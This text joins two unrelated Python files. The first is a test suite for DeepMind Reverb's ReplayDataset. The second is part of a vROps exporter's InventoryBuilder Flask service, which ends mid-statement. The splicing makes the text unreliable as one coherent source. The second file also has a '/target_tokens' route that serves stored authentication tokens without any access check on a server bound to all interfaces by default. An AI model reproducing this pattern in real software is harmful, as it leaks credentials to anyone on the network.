# Lint as: python3 # Copyright 2019 DeepMind Technologies Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for dataset.""" import threading import time from absl.testing import parameterized import numpy as np from reverb import client from reverb import dataset as reverb_dataset from reverb import errors from reverb import item_selectors from reverb import rate_limiters from reverb import replay_sample from reverb import server as reverb_server import tensorflow.compat.v1 as tf import tree from tensorflow.python.framework import tensor_spec # pylint:disable=g-direct-tensorflow-import def make_server(): return reverb_server.Server( tables=[ reverb_server.Table( 'dist', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1)), reverb_server.Table( 'signatured', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1), signature=tf.TensorSpec(dtype=tf.float32, shape=(None, None))), reverb_server.Table( 'bounded_spec_signatured', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1), # Currently only the `shape` and `dtype` of the bounded spec # is considered during signature check. # TODO(b/158033101): Check the boundaries as well. 
signature=tensor_spec.BoundedTensorSpec( dtype=tf.float32, shape=(None, None), minimum=(0.0, 0.0), maximum=(10.0, 10.)), ), ], port=None, ) class ReplayDatasetTest(tf.test.TestCase, parameterized.TestCase): @classmethod def setUpClass(cls): super().setUpClass() cls._server = make_server() cls._client = client.Client(f'localhost:{cls._server.port}') def tearDown(self): super().tearDown() self._client.reset('dist') self._client.reset('signatured') self._client.reset('bounded_spec_signatured') @classmethod def tearDownClass(cls): super().tearDownClass() cls._server.stop() def _populate_replay(self, sequence_length=100, max_time_steps=None): max_time_steps = max_time_steps or sequence_length with self._client.writer(max_time_steps) as writer: for i in range(1000): writer.append([np.zeros((3, 3), dtype=np.float32)]) if i % 5 == 0 and i >= sequence_length: writer.create_item( table='dist', num_timesteps=sequence_length, priority=1) writer.create_item( table='signatured', num_timesteps=sequence_length, priority=1) writer.create_item( table='bounded_spec_signatured', num_timesteps=sequence_length, priority=1) def _sample_from(self, dataset, num_samples): iterator = dataset.make_initializable_iterator() dataset_item = iterator.get_next() self.evaluate(iterator.initializer) return [self.evaluate(dataset_item) for _ in range(num_samples)] @parameterized.named_parameters( { 'testcase_name': 'default_values', }, { 'testcase_name': 'num_workers_per_iterator_is_0', 'num_workers_per_iterator': 0, 'want_error': ValueError, }, { 'testcase_name': 'num_workers_per_iterator_is_1', 'num_workers_per_iterator': 1, }, { 'testcase_name': 'num_workers_per_iterator_is_minus_1', 'num_workers_per_iterator': -1, }, { 'testcase_name': 'num_workers_per_iterator_is_minus_2', 'num_workers_per_iterator': -2, 'want_error': ValueError, }, { 'testcase_name': 'max_samples_per_stream_is_0', 'max_samples_per_stream': 0, 'want_error': ValueError, }, { 'testcase_name': 'max_samples_per_stream_is_1', 'max_samples_per_stream': 1, }, { 'testcase_name': 'max_samples_per_stream_is_minus_1', 'max_samples_per_stream': -1, }, { 'testcase_name': 'max_samples_per_stream_is_minus_2', 'num_workers_per_iterator': -2, 'want_error': ValueError, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_0', 'max_in_flight_samples_per_worker': 0, 'want_error': ValueError, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_1', 'max_in_flight_samples_per_worker': 1, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_minus_1', 'max_in_flight_samples_per_worker': -1, 'want_error': ValueError, }, ) def test_sampler_parameter_validation(self, **kwargs): dtypes = (tf.float32,) shapes = (tf.TensorShape([3, 3]),) if 'max_in_flight_samples_per_worker' not in kwargs: kwargs['max_in_flight_samples_per_worker'] = 100 if 'want_error' in kwargs: error = kwargs.pop('want_error') with self.assertRaises(error): reverb_dataset.ReplayDataset(self._client.server_address, 'dist', dtypes, shapes, **kwargs) else: reverb_dataset.ReplayDataset(self._client.server_address, 'dist', dtypes, shapes, **kwargs) def test_iterate(self): self._populate_replay() dataset = reverb_dataset.ReplayDataset( tf.constant(self._client.server_address), table=tf.constant('dist'), dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # A single sample is returned so the key should be a scalar int64. 
self.assertIsInstance(sample.info.key, np.uint64) np.testing.assert_array_equal(sample.data[0], np.zeros((3, 3), dtype=np.float32)) def test_distribution_strategy(self): self._populate_replay() physical_devices = tf.config.list_physical_devices('CPU') configs = tf.config.experimental.get_virtual_device_configuration( physical_devices[0]) if configs is None: virtual_devices = [tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)] tf.config.experimental.set_virtual_device_configuration( physical_devices[0], virtual_devices) strategy = tf.distribute.MirroredStrategy(['/cpu:%d' % i for i in range(4)]) def reverb_dataset_fn(i): tf.print('Creating dataset for replica; index:', i) return reverb_dataset.ReplayDataset( self._client.server_address, table=tf.constant('dist'), dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100).take(2) def dataset_fn(_): return tf.data.Dataset.range(4).flat_map(reverb_dataset_fn).take(2 * 4) ds = strategy.experimental_distribute_datasets_from_function(dataset_fn) def check_probabilities(_, v): probability = v.info.probability self.assertLen(probability.values, 4) # Don't use any math ops since tensor values seem to contain # unaligned tensors on some systems; but tf.print doesn't check alignment. # # This seems to be caused by a compatibility issue where DistStrat isn't # well tested when eager mode is disabled. So instead of treating this # as a true TF bug, we just work around it. We can remove this hack and # convert it to e.g. tf.assert_greater type check if/when we enable eager # execution for these tests. tf.print('Probability values:', probability.values) def get_next_value(v): return tf.distribute.get_replica_context().merge_call( check_probabilities, args=(v,)) @tf.function def run_strategy(ds_): i = tf.constant(0) for v in ds_: strategy.run(get_next_value, args=(v,)) i += 1 return i rs = run_strategy(ds) # Each iteration contains 4 items - one from each replica. We take 8 items # total, so there should be 2 iterations. 
self.assertEqual(2, self.evaluate(rs)) def test_timeout_invalid_arguments(self): with self.assertRaisesRegex(ValueError, r'must be an integer >= -1'): reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=-2, max_in_flight_samples_per_worker=100) def test_timeout(self): dataset_0s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=0, max_in_flight_samples_per_worker=100) dataset_1s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=1000, max_in_flight_samples_per_worker=100) dataset_2s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=2000, max_in_flight_samples_per_worker=100) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_0s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 0) self.assertLess(duration, 5) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_1s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 1) self.assertLess(duration, 10) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_2s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 2) self.assertLess(duration, 10) # If we insert some data, and the rate limiter doesn't force any waiting, # then we can ask for a timeout of 0s and still get data back. self._populate_replay() got = self._sample_from(dataset_0s, 2) self.assertLen(got, 2) @parameterized.parameters(['signatured'], ['bounded_spec_signatured']) def test_inconsistent_signature_size(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32, tf.float64), shapes=(tf.TensorShape([3, 3]), tf.TensorShape([])), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Inconsistent number of tensors requested from table \'{}\'. ' r'Requested 6 tensors, but table signature shows 5 tensors.'.format( table_name)): self._sample_from(dataset, 10) @parameterized.parameters(['signatured'], ['bounded_spec_signatured']) def test_incompatible_signature_dtype(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.int64,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). 
' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset, 10) dataset_emit_sequences = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.int64,), shapes=(tf.TensorShape([None, 3, 3]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset_emit_sequences, 10) @parameterized.parameters(['signatured'], ['bounded_spec_signatured']) def test_incompatible_signature_shape(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([3]),), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset, 10) dataset_emit_sequences = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([None, 3]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Requested incompatible tensor at flattened index 4 from table ' r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). ' r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)): self._sample_from(dataset_emit_sequences, 10) @parameterized.parameters([1], [3], [10]) def test_incompatible_shape_when_using_sequence_length(self, sequence_length): with self.assertRaises(ValueError): reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([sequence_length + 1, 3, 3]),), emit_timesteps=False, sequence_length=sequence_length, max_in_flight_samples_per_worker=100) def test_incompatible_dataset_shapes_and_types_without_signature(self): self._populate_replay() ds_wrong_shape = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([]),), max_in_flight_samples_per_worker=100) with self.assertRaisesRegex( tf.errors.InvalidArgumentError, r'Specification has \(dtype, shape\): \(float, \[\]\). ' r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'): self._sample_from(ds_wrong_shape, 1) ds_full_sequences_wrong_shape = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([None]),), emit_timesteps=False, max_in_flight_samples_per_worker=100) with self.assertRaisesRegex( tf.errors.InvalidArgumentError, r'Specification has \(dtype, shape\): \(float, \[\]\). 
' r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'): self._sample_from(ds_full_sequences_wrong_shape, 1) @parameterized.parameters( ('dist', 1, 1), ('dist', 1, 3), ('dist', 3, 3), ('dist', 3, 5), ('dist', 10, 10), ('dist', 10, 11), ('signatured', 1, 1), ('signatured', 3, 3), ('signatured', 3, 5), ('signatured', 10, 10), ('bounded_spec_signatured', 1, 1), ('bounded_spec_signatured', 3, 3), ('bounded_spec_signatured', 3, 5), ('bounded_spec_signatured', 10, 10), ) def test_iterate_with_sequence_length(self, table_name, sequence_length, max_time_steps): # Also ensure we get sequence_length-shaped outputs when # writers' max_time_steps != sequence_length. self._populate_replay(sequence_length, max_time_steps=max_time_steps) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([sequence_length, 3, 3]),), emit_timesteps=False, sequence_length=sequence_length, max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys and data should be batched up by the sequence length. self.assertEqual(sample.info.key.shape, (sequence_length,)) np.testing.assert_array_equal( sample.data[0], np.zeros((sequence_length, 3, 3), dtype=np.float32)) @parameterized.parameters( ('dist', 1), ('dist', 3), ('dist', 10), ('signatured', 1), ('signatured', 3), ('signatured', 10), ('bounded_spec_signatured', 1), ('bounded_spec_signatured', 3), ('bounded_spec_signatured', 10), ) def test_iterate_with_unknown_sequence_length(self, table_name, sequence_length): self._populate_replay(sequence_length) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([None, 3, 3]),), emit_timesteps=False, sequence_length=None, max_in_flight_samples_per_worker=100) # Check the shape of the items. iterator = dataset.make_initializable_iterator() dataset_item = iterator.get_next() self.assertIsNone(dataset_item.info.key.shape.as_list()[0], None) self.assertIsNone(dataset_item.data[0].shape.as_list()[0], None) # Verify that once evaluated, the samples has the expected length. got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys and data should be batched up by the sequence length. 
self.assertEqual(sample.info.key.shape, (sequence_length,)) np.testing.assert_array_equal( sample.data[0], np.zeros((sequence_length, 3, 3), dtype=np.float32)) @parameterized.parameters( ('dist', 1, 2), ('dist', 2, 1), ('signatured', 1, 2), ('signatured', 2, 1), ('bounded_spec_signatured', 1, 2), ('bounded_spec_signatured', 2, 1), ) def test_checks_sequence_length_when_timesteps_emitted( self, table_name, actual_sequence_length, provided_sequence_length): self._populate_replay(actual_sequence_length) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([provided_sequence_length, 3, 3]),), emit_timesteps=True, sequence_length=provided_sequence_length, max_in_flight_samples_per_worker=100) with self.assertRaises(tf.errors.InvalidArgumentError): self._sample_from(dataset, 10) @parameterized.named_parameters( dict(testcase_name='TableDist', table_name='dist'), dict(testcase_name='TableSignatured', table_name='signatured'), dict( testcase_name='TableBoundedSpecSignatured', table_name='bounded_spec_signatured')) def test_iterate_batched(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(2, True) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # The keys should be batched up like the data. self.assertEqual(sample.info.key.shape, (2,)) np.testing.assert_array_equal(sample.data[0], np.zeros((2, 3, 3), dtype=np.float32)) def test_iterate_nested_and_batched(self): with self._client.writer(100) as writer: for i in range(1000): writer.append({ 'observation': { 'data': np.zeros((3, 3), dtype=np.float32), 'extras': [ np.int64(10), np.ones([1], dtype=np.int32), ], }, 'reward': np.zeros((10, 10), dtype=np.float32), }) if i % 5 == 0 and i >= 100: writer.create_item( table='dist', num_timesteps=100, priority=1) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(((tf.float32), (tf.int64, tf.int32)), tf.float32), shapes=((tf.TensorShape([3, 3]), (tf.TensorShape(None), tf.TensorShape([1]))), tf.TensorShape([10, 10])), max_in_flight_samples_per_worker=100) dataset = dataset.batch(3) structure = { 'observation': { 'data': tf.TensorSpec([3, 3], tf.float32), 'extras': [ tf.TensorSpec([], tf.int64), tf.TensorSpec([1], tf.int32), ], }, 'reward': tf.TensorSpec([], tf.int64), } got = self._sample_from(dataset, 10) self.assertLen(got, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) transition = tree.unflatten_as(structure, tree.flatten(sample.data)) np.testing.assert_array_equal(transition['observation']['data'], np.zeros([3, 3, 3], dtype=np.float32)) np.testing.assert_array_equal(transition['observation']['extras'][0], np.ones([3], dtype=np.int64) * 10) np.testing.assert_array_equal(transition['observation']['extras'][1], np.ones([3, 1], dtype=np.int32)) np.testing.assert_array_equal(transition['reward'], np.zeros([3, 10, 10], dtype=np.float32)) def test_multiple_iterators(self): with self._client.writer(100) as writer: for i in range(10): writer.append([np.ones((81, 81), dtype=np.float32) * i]) writer.create_item(table='dist', num_timesteps=10, priority=1) trajectory_length = 5 batch_size = 3 dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), 
shapes=(tf.TensorShape([81, 81]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(trajectory_length) iterators = [ dataset.make_initializable_iterator() for _ in range(batch_size) ] items = tf.stack( [tf.squeeze(iterator.get_next().data) for iterator in iterators]) with self.session() as session: session.run([iterator.initializer for iterator in iterators]) got = session.run(items) self.assertEqual(got.shape, (batch_size, trajectory_length, 81, 81)) want = np.array( [[np.ones([81, 81]) * i for i in range(trajectory_length)]] * batch_size) np.testing.assert_array_equal(got, want) def test_iterate_over_blobs(self): for _ in range(10): self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.int32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 20) self.assertLen(got, 20) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertIsInstance(sample.info.key, np.uint64) self.assertIsInstance(sample.info.probability, np.float64) np.testing.assert_array_equal(sample.data[0], np.ones((3, 3), dtype=np.int32)) def test_iterate_over_batched_blobs(self): for _ in range(10): self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.int32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) dataset = dataset.batch(5) got = self._sample_from(dataset, 20) self.assertLen(got, 20) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertEqual(sample.info.key.shape, (5,)) np.testing.assert_array_equal(sample.data[0], np.ones((5, 3, 3), dtype=np.int32)) def test_converts_spec_lists_into_tuples(self): for _ in range(10): data = [ (np.ones([1, 1], dtype=np.int32),), [ np.ones([3, 3], dtype=np.int8), (np.ones([2, 2], dtype=np.float64),) ], ] self._client.insert(data, {'dist': 1}) dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=[ (tf.int32,), [ tf.int8, (tf.float64,), ], ], shapes=[ (tf.TensorShape([1, 1]),), [ tf.TensorShape([3, 3]), (tf.TensorShape([2, 2]),), ], ], max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) self.assertIsInstance(sample.info.key, np.uint64) tree.assert_same_structure(sample.data, ( (None,), ( None, (None,), ), )) def test_session_is_closed_while_op_pending(self): dataset = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=tf.float32, shapes=tf.TensorShape([]), max_in_flight_samples_per_worker=100) iterator = dataset.make_initializable_iterator() item = iterator.get_next() def _session_closer(sess, wait_time_secs): def _fn(): time.sleep(wait_time_secs) sess.close() return _fn with self.session() as sess: sess.run(iterator.initializer) thread = threading.Thread(target=_session_closer(sess, 3)) thread.start() with self.assertRaises(tf.errors.CancelledError): sess.run(item) class FromTableSignatureTest(tf.test.TestCase): def test_table_not_found(self): server = reverb_server.Server([ reverb_server.Table.queue('table_a', 10), reverb_server.Table.queue('table_c', 10), reverb_server.Table.queue('table_b', 10), ]) address = f'localhost:{server.port}' with self.assertRaisesWithPredicateMatch( ValueError, f'Server at {address} does not contain any table named 
not_found. ' f'Found: table_a, table_b, table_c.'): reverb_dataset.ReplayDataset.from_table_signature( address, 'not_found', 100) def test_server_not_found(self): with self.assertRaises(errors.DeadlineExceededError): reverb_dataset.ReplayDataset.from_table_signature( 'localhost:1234', 'not_found', 100, get_signature_timeout_secs=1) def test_table_does_not_have_signature(self): server = make_server() address = f'localhost:{server.port}' with self.assertRaisesWithPredicateMatch( ValueError, f'Table dist at {address} does not have a signature.'): reverb_dataset.ReplayDataset.from_table_signature( address, 'dist', 100) def test_sets_dtypes_from_signature(self): signature = { 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, 'x': tf.TensorSpec([None], tf.uint64), } server = reverb_server.Server( [reverb_server.Table.queue('queue', 10, signature=signature)]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100) self.assertDictEqual(dataset.element_spec.data, signature) def test_sets_dtypes_from_bounded_spec_signature(self): bounded_spec_signature = { 'a': { 'b': tensor_spec.BoundedTensorSpec([3, 3], tf.float32, 0, 3), 'c': tensor_spec.BoundedTensorSpec([], tf.int64, 0, 5), }, } server = reverb_server.Server([ reverb_server.Table.queue( 'queue', 10, signature=bounded_spec_signature) ]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100) self.assertDictEqual( dataset.element_spec.data, { 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, }) def test_combines_sequence_length_with_signature_if_not_emit_timestamps(self): server = reverb_server.Server([ reverb_server.Table.queue( 'queue', 10, signature={ 'a': { 'b': tf.TensorSpec([3, 3], tf.float32), 'c': tf.TensorSpec([], tf.int64), }, }) ]) dataset = reverb_dataset.ReplayDataset.from_table_signature( f'localhost:{server.port}', 'queue', 100, emit_timesteps=False, sequence_length=5) self.assertDictEqual( dataset.element_spec.data, { 'a': { 'b': tf.TensorSpec([5, 3, 3], tf.float32), 'c': tf.TensorSpec([5], tf.int64), }, }) if __name__ == '__main__': tf.disable_eager_execution() tf.test.main()
InventoryBuilder.py
from flask import Flask from gevent.pywsgi import WSGIServer from threading import Thread from resources.Resourceskinds import NSXTMgmtPlane from tools.Vrops import Vrops import time import json import os import logging logger = logging.getLogger('vrops-exporter') class InventoryBuilder: def __init__(self, atlas_config, port, sleep, timeout): self.atlas_config = atlas_config self.port = int(port) self.sleep = sleep self.timeout = int(timeout) self._user = os.environ["USER"] self._password = os.environ["PASSWORD"] self.vcenter_dict = dict() self.nsxt_dict = dict() self.target_tokens = dict() self.iterated_inventory = dict() self.vrops_collection_times = dict() self.response_codes = dict() self.successful_iteration_list = [0] self.wsgi_address = '0.0.0.0' if 'LOOPBACK' in os.environ: if os.environ['LOOPBACK'] == '1': self.wsgi_address = '127.0.0.1' thread = Thread(target=self.run_rest_server) thread.start() self.query_inventory_permanent() def run_rest_server(self): app = Flask(__name__) logger.info(f'serving /vrops_list on {self.port}') @app.route('/vrops_list', methods=['GET']) def vrops_list(): return json.dumps(self.vrops_list) logger.info(f'serving /inventory on {self.port}') @app.route('/<target>/vcenters/<int:iteration>', methods=['GET']) def vcenters(target, iteration): return self.iterated_inventory[str(iteration)]['vcenters'].get(target, {}) @app.route('/<target>/datacenters/<int:iteration>', methods=['GET']) def datacenters(target, iteration): return self.iterated_inventory[str(iteration)]['datacenters'].get(target, {}) @app.route('/<target>/clusters/<int:iteration>', methods=['GET']) def clusters(target, iteration): return self.iterated_inventory[str(iteration)]['clusters'].get(target, {}) @app.route('/<target>/hosts/<int:iteration>', methods=['GET']) def hosts(target, iteration): return self.iterated_inventory[str(iteration)]['hosts'].get(target, {}) @app.route('/<target>/datastores/<int:iteration>', methods=['GET']) def datastores(target, iteration): return self.iterated_inventory[str(iteration)]['datastores'].get(target, {}) @app.route('/<target>/vms/<int:iteration>', methods=['GET']) def vms(target, iteration): return self.iterated_inventory[str(iteration)]['vms'].get(target, {}) @app.route('/<target>/nsxt_mgmt_cluster/<int:iteration>', methods=['GET']) def nsxt_mgmt_cluster(target, iteration): return self.iterated_inventory[str(iteration)]['nsxt_resources'].get(target, {}) @app.route('/iteration', methods=['GET']) def iteration(): return_iteration = self.successful_iteration_list[-1] return str(return_iteration) @app.route('/collection_times', methods=['GET']) def collection_times(): vrops_collection_times = self.vrops_collection_times return json.dumps(vrops_collection_times) @app.route('/api_response_codes', methods=['GET']) def api_response_codes(): response_codes = self.response_codes return json.dumps(response_codes) # debugging purpose @app.route('/iteration_store', methods=['GET']) def iteration_store(): return_iteration = self.successful_iteration_list return json.dumps(return_iteration) # FIXME: this could basically be the always active token list. no active token? refresh! 
@app.route('/target_tokens', methods=['GET']) def token(): return json.dumps(self.target_tokens) try: if logger.level == 10: # WSGi is logging on DEBUG Level WSGIServer((self.wsgi_address, self.port), app).serve_forever() else: WSGIServer((self.wsgi_address, self.port), app, log=None).serve_forever() except TypeError as e: logger.error('Problem starting server, you might want to try LOOPBACK=0 or LOOPBACK=1') logger.error(f'Current used options: {self.wsgi_address} on port {self.port}') logger.error(f'TypeError: {e}') def get_vrops(self): with open(self.atlas_config) as json_file: netbox_json = json.load(json_file) self.vrops_list = [target['labels']['server_name'] for target in netbox_json if target['labels']['job'] == "vrops"] def query_inventory_permanent(self): # first iteration to fill is 1. while this is not ready, # curl to /iteration would still report 0 to wait for actual data self.iteration = 1 while True: # get vrops targets every run in case we have new targets appearing self.get_vrops() if len(self.successful_iteration_list) > 3: iteration_to_be_deleted = self.successful_iteration_list.pop(0) # initial case, since 0 is never filled in iterated_inventory if iteration_to_be_deleted == 0: continue self.iterated_inventory.pop(str(iteration_to_be_deleted)) logger.debug(f'deleting iteration {iteration_to_be_deleted}') # initialize empty inventory per iteration self.iterated_inventory[str(self.iteration)] = dict() logger.info(f'real run {self.iteration}') threads = list() for vrops in self.vrops_list: vrops_short_name = vrops.split('.')[0] thread = Thread(target=self.query_vrops, args=(vrops, vrops_short_name)) thread.start() threads.append((thread, vrops)) timeout = self.timeout timeout_reached = False start_time = time.time() current_time = start_time joined_threads = dict() while current_time <= (start_time + timeout): for t in threads: if not t[0].is_alive(): t[0].join() if t[0] not in joined_threads: joined_threads.setdefault(t[1], round(time.time() - start_time)) if len(joined_threads.keys()) >= len(threads): break time.sleep(1) current_time = time.time() else: still_running = [t for t in threads if t[0].is_alive()] for running_thread in still_running: logger.info(f"Timeout {timeout}s reached for fetching {running_thread[1]}") running_thread[0].join(0) timeout_reached = True for vrops in joined_threads: self.vrops_collection_times[vrops] = joined_threads[vrops] logger.info(f"Fetched {vrops} in {joined_threads[vrops]}s") self.get_vcenters() self.get_datacenters() self.get_clusters() self.get_hosts() self.get_datastores() self.get_vms() self.get_nsxt_mgmt_cluster() if len(self.iterated_inventory[str(self.iteration)]['vcenters']) > 0: self.successful_iteration_list.append(self.iteration) else: # immediately withdraw faulty inventory logger.debug(f'Withdrawing current iteration: {self.iteration}') self.iterated_inventory.pop(str(self.iteration)) self.iteration += 1 if not timeout_reached: logger.info(f'Inventory relaxing before going to work again in {self.sleep}s') time.sleep(int(self.sleep)) def query_vrops(self, vrops, vrops_short_name): logger.info(f'Querying {vrops}') token, self.response_codes[vrops] = Vrops.get_token(target=vrops) if not token: logger.warning(f'retrying connection to {vrops} in next iteration {self.iteration + 1}') return False self.target_tokens[vrops] = token logger.info(f'########## Collecting resources {vrops_short_name}... 
##########') vcenter = self.create_vcenter_objects(vrops, token) nsxt_adapter = self.create_nsxt_objects(vrops, token) self.vcenter_dict[vrops] = vcenter self.nsxt_dict[vrops] = nsxt_adapter return True def create_vcenter_objects(self, target: str, token: str): vrops = Vrops() vcenter_adapter = Vrops.get_vcenter_adapter(vrops, target, token) if not vcenter_adapter: logger.critical(f'Could not get vcenter adapter!') return False logger.debug(f'Collecting vcenter: {vcenter_adapter.name}') datacenter = Vrops.get_datacenter(vrops, target, token, [vcenter_adapter.uuid]) cluster = Vrops.get_cluster(vrops, target, token, [dc.uuid for dc in datacenter]) datastores = Vrops.get_datastores(vrops, target, token, [dc.uuid for dc in datacenter]) hosts = Vrops.get_hosts(vrops, target, token, [cl.uuid for cl in cluster]) vms = Vrops.get_vms(vrops, target, token, [hs.uuid for hs in hosts], vcenter_adapter.uuid) for dc in datacenter: vcenter_adapter.add_datacenter(dc) for dc_object in vcenter_adapter.datacenter: logger.debug(f'Collecting datacenter: {dc_object.name}') for ds in datastores: if ds.parent == dc_object.uuid: dc_object.add_datastore(ds) logger.debug(f'Collecting datastore: {ds.name}') for cl in cluster: dc_object.add_cluster(cl) for cl_object in dc_object.clusters: logger.debug(f'Collecting cluster: {cl_object.name}') for hs in hosts: if hs.parent == cl_object.uuid: cl_object.add_host(hs) for hs_object in cl_object.hosts: logger.debug(f'Collecting host: {hs_object.name}') for vm in vms: if vm.parent == hs_object.uuid: hs_object.add_vm(vm) logger.debug(f'Collecting VM: {vm.name}') return vcenter_adapter def create_nsxt_objects(self, target: str, token: str): vrops = Vrops() nsxt_adapter = Vrops.get_nsxt_adapter(vrops, target, token) if not nsxt_adapter: return False nsxt_mgmt_plane = NSXTMgmtPlane(target, token) for adapter in nsxt_adapter: logger.debug(f'Collecting NSX-T adapter: {adapter.name}') nsxt_mgmt_plane.add_adapter(adapter) nsxt_mgmt_cluster = 